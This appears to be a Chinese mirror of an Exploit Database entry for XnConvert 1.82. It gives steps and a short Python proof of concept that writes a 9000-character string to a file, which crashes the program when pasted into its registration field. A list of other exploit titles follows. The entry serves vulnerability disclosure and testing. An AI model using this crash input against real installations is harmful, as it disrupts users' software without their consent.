XnConvert 1.82 – Denial of Service (PoC)

Exploit Database
80 阅读

作者： Gokkulraj

日期： 2019-12-23
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/47801/

# Exploit Title: XnConvert 1.82 - Denial of Service (PoC)
# Date: 2019-12-21
# Vendor Homepage: https://www.xnview.com
# Software Link: https://www.xnview.com/en/apps/
# Exploit Author: Gokkulraj (TwinTech Solutions)
# Tested Version: v1.82
# Tested on: Windows 7 x64

# 1.- Download and install XnConvert
# 2.- Run python code : XnConvert.py
# 3.- Open EVIL.txt and copy content to clipboard
# 4.- Open XnConvert and Click 'EnterKey'
# 5.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 6.- Click 'OK' and you will see a pop-up stating Invalid code and then click 'OK' you will see the crash.

#!/usr/bin/env python
Dos= "\x41" * 9000
myfile=open('Evil.txt','w')
myfile.writelines(Dos)
myfile.close()
print("File created")

last Exploits
XnConvert 1.82 – Denial of Service (PoC)的更多信息

ABC2MTEX 1.6.1 – Command Line Stack Overflow：
Mocha LPD 1.9 – Remote Buffer Overflow (Denial of Service) (PoC)：
ipPulse 1.92 – ‘IP Address/HostName-Comment’ Denial of Service (PoC)：
Solaris/Open Solaris UCODE_GET_VERSION IOCTL – Denial of Service：
Microsoft Win32k – Null Pointer De-reference (PoC) (MS11-077)：
Microsoft Office 2007 – ‘mso.dll’ Use-After-Free (MS15-081)：
TapinRadio 2.12.3 – ‘address’ Denial of Service (PoC)：
Apple Mac OSX 10.10 – IOKit IntelAccelerator Null Pointer Dereference：